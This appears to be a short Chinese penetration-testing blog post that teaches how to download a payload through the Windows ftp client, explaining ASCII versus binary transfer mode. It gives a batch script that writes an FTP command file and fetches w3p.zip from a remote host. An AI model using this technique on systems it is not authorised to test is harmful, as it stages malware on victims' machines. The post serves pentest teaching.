您现在的位置是：网站首页> 网络安全渗透测试

利用ftp一句话下载payload

栗子2019-07-26 18:05:46【渗透测试】人已围观

简介在渗透过程中难免遇到各种限制，这里教大家一个骚套路，使用ftp下载payload，一般情况下用的比较少。

在FTP文件传输过程中，ASCII传输HTML和文本编写的文件，而二进制码传输可以传送

文本和非文本(执行文件，压缩文件，图片等)，具有通用性，二进制码传输速度比ASCII 传输要快。，所以在建立bat脚本时，一般输入bin命令，启用二进制传输。如果用ASCII模式传输非文本文件，可能会显示一堆乱码。Ascii和binary模式的区别是回车换行的处理。 binary模式不对数据进行任何处理，asci模式将回车换行转换为本机的回车字符，比如Unix 下是\n,Windows下是\r\n，Mac下是\r。unix系统下行结束符是一个字节，即十六进制的 0A，而ms的系统是两个字节，即十六进制的0D0A。

建立个bat批处理文件。

@echo off
echo open 10.10.10.111 21> ftp.txt
echo administrator(user)>> ftp.txt
echo password>> ftp.txt
echo binary >> ftp.txt
echo get w3p.zip>> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

直接运行。会自动在本地下载“get”对于的payload。